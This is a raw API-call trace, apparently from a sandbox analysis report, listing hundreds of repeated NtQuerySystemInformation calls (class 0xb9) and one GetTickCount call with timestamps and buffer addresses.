NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x50, ResultLength=0x0) [0274.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x50, ResultLength=0x0) [0274.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfded0, Length=0x38, ResultLength=0x0) [0274.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde10, Length=0x28, ResultLength=0x0) [0274.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd28, Length=0x50, ResultLength=0x0) [0274.046] GetTickCount () returned 0x1184ce5 [0274.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf8, Length=0x58, ResultLength=0x0) [0274.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x38, ResultLength=0x0) [0274.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x28, ResultLength=0x0) [0274.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x28, ResultLength=0x0) [0274.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x28, ResultLength=0x0) [0274.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x28, ResultLength=0x0) [0274.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x28, ResultLength=0x0) [0274.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x38, ResultLength=0x0) [0274.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x28, ResultLength=0x0) [0274.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x28, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x38, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x20, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x38, ResultLength=0x0) [0274.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x20, ResultLength=0x0) [0274.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x20, ResultLength=0x0) [0274.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x20, ResultLength=0x0) [0274.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf8, Length=0x58, ResultLength=0x0) [0274.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0274.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0274.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0274.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0274.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0274.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x28, ResultLength=0x0) [0274.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0274.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0274.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x28, ResultLength=0x0) [0274.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x28, ResultLength=0x0) [0274.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0274.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0274.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda40, Length=0x20, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x20, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x20, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x20, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x20, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x20, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf8, Length=0x58, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x58, ResultLength=0x0) [0274.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0274.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0274.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0274.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0274.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0274.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x28, ResultLength=0x0) [0274.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0274.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x28, ResultLength=0x0) [0274.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x28, ResultLength=0x0) [0274.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0274.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x20, ResultLength=0x0) [0274.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x20, ResultLength=0x0) [0274.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x20, ResultLength=0x0) [0274.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x20, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x20, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x58, ResultLength=0x0) [0274.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0274.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0274.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0274.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0274.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0274.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x28, ResultLength=0x0) [0274.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0274.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x28, ResultLength=0x0) [0274.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x28, ResultLength=0x0) [0274.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7a0, Length=0x20, ResultLength=0x0) [0274.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd720, Length=0x20, ResultLength=0x0) [0274.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd720, Length=0x20, ResultLength=0x0) [0274.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd720, Length=0x20, ResultLength=0x0) [0274.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 